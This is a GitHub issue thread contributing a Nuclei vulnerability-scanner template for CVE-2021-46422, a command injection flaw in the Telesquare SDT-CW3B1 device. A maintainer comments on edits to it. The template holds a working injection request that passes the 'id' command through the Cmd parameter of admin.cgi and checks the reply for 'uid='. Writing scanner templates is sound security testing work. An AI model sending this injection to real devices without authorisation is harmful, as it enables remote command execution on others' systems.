CVE-2021-46422
badboycxcc opened this issue · comments
BackDoor commented
Template Information:
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
Nuclei Template:
id: CVE-2021-46422
info:
name: SDT-CW3B1 1.1.0 - OS command injection
author: remote
severity: high
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
- https://www.exploit-db.com/exploits/50936
tags: cve,cve2021
classification:
cve-id: CVE-2021-46422
requests:
- method: GET
path:
- "{{RootURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{exploit}}"
payloads:
exploit:
- "id"
attack: pitchfork
matchers:
- type: regex
part: body
regex:
- "uid=.*"
Prince Chaddha commented
Hello @badboycxcc, I have made a few changes to the template. I have also moved the payload to variables since the payloads are not intended to be used as attack vectors, but rather as a wordlist for various attack types.
Thank you so much for sharing this template with the community and contributing to this project 🍻
BackDoor commented
ok!